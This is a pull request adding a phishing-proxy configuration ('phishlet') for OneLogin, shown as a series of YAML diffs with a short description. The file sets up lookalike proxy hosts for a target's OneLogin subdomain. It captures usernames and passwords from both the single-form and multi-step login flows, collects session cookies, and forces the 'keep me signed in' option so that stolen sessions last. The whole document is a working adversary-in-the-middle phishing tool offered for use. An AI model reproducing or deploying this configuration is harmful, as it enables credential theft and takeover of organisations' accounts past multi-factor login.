### PR TITLE
Adding onelogin phishlet

### DIFF
--- a/phishlets/onelogin.yaml
+++ b/phishlets/onelogin.yaml
@@ -14,6 +14,9 @@ auth_tokens:
     keys: ['onelogin.com_user']
   - domain: 'EXAMPLE.onelogin.com'
     keys: ['sub_session_onelogin.com']
+auth_urls:
+ - '/portal/'
+ - '/client/apps'
 # This is used to force the rememebr me functionality if the target is using the /login url
 # This method will not work if they are using the multistep login method on the /login2 url  
 force_post:

--- a/phishlets/onelogin.yaml
+++ b/phishlets/onelogin.yaml
@@ -1,0 +1,37 @@
+name: 'onelogin'
+author: '@perfectlylogical'
+min_ver: '2.3.0'
+# NOTE: Do not forget to change EXMAPLE to the relevant sub domain.
+proxy_hosts:
+  - {phish_sub: '', orig_sub: '', domain: 'onelogin.com', session: false, is_landing: false }
+  - {phish_sub: 'EXAMPLE', orig_sub: 'EXAMPLE', domain: 'onelogin.com', session: true, is_landing: true}
+  - {phish_sub: 'portal-cdn', orig_sub: 'portal-cdn', domain: 'onelogin.com', session: false, is_landing: false}
+  # Uncomment this line if the target is using the default CSS for onelogin. Will manifest as the login page not loading.
+  #- {phish_sub: 'web-login-cdn', orig_sub: 'web-login-cdn', domain: 'onelogin.com', session: false, is_landing: false}
+sub_filters: []
+auth_tokens:
+  - domain: '.onelogin.com'
+    keys: ['onelogin.com_user']
+  - domain: 'EXAMPLE.onelogin.com'
+    keys: ['sub_session_onelogin.com']
+credentials:
+  username:
+    key: 'email'
+    search: '(.*)'
+    type: 'post'
+  password:
+    key: 'password'
+    search: '(.*)'
+    type: 'post'
+  # You will need to uncomment the custom section if the target is using /login2/.
+  # When using /login2/ it changes how it sends the JSON to the server.
+  #custom:
+  #  - key: 'username'
+  #    search: '"login":"(.*)"'
+  #    type: 'json'
+  #  - key: 'password'
+  #    search: '"password":"(.*)",'
+  #    type: 'json'
+login:
+  domain: 'EXAMPLE.onelogin.com'
+  path: '/login'

--- a/phishlets/onelogin.yaml
+++ b/phishlets/onelogin.yaml
@@ -25,6 +25,8 @@ force_post:
     force:
       - {key: 'persist_session', value: 'true'}
     type: 'post'
+# The post type is used to capture credentials which use the /login url
+# The json type is used to capture credentials which use the /login2 url
 credentials:
   username:
     key: 'email'
@@ -34,15 +36,14 @@ credentials:
     key: 'password'
     search: '(.*)'
     type: 'post'
-  # You will need to uncomment the custom section if the target is using /login2/.
-  # When using /login2/ it changes from using a post to sending json across multiple requests.
-  #custom:
-  #  - key: 'username'
-  #    search: '"login":"(.*)"'
-  #    type: 'json'
-  #  - key: 'password'
-  #    search: '"password":"(.*)",'
-  #    type: 'json'
+  username:
+    key: 'login'
+    search: '"login":"(.*)"'
+    type: 'json'
+  password:
+    key: 'password'
+    search: '"password":"(.*)",'
+    type: 'json'
 login:
   domain: 'EXAMPLE.onelogin.com'
   path: '/login'

--- a/phishlets/onelogin.yaml
+++ b/phishlets/onelogin.yaml
@@ -14,6 +14,17 @@ auth_tokens:
     keys: ['onelogin.com_user']
   - domain: 'EXAMPLE.onelogin.com'
     keys: ['sub_session_onelogin.com']
+# This is used to force the rememebr me functionality if the target is using the /login url
+# This method will not work if they are using the multistep login method on the /login2 url  
+force_post:
+  - path: '/sessions'
+    search:
+      - {key: 'authenticity_token', search: '.*'}
+      - {key: 'email', search: '.*'}
+      - {key: 'password', search: '.*'}
+    force:
+      - {key: 'persist_session', value: 'true'}
+    type: 'post'
 credentials:
   username:
     key: 'email'
@@ -24,7 +35,7 @@ credentials:
     search: '(.*)'
     type: 'post'
   # You will need to uncomment the custom section if the target is using /login2/.
-  # When using /login2/ it changes how it sends the JSON to the server.
+  # When using /login2/ it changes from using a post to sending json across multiple requests.
   #custom:
   #  - key: 'username'
   #    search: '"login":"(.*)"'


### PR DESCRIPTION
New Phishlet: OneLogin

OneLogin phishlet that will handle any combination of the following OneLogin configurations

1. Using custom CSS on the login page.
2. Using the default OneLogin login page.
3. Using the multi step login process (/login2/)
4. Using the single form login process (/login/)
5. Force "Keep me signed in" on /login urls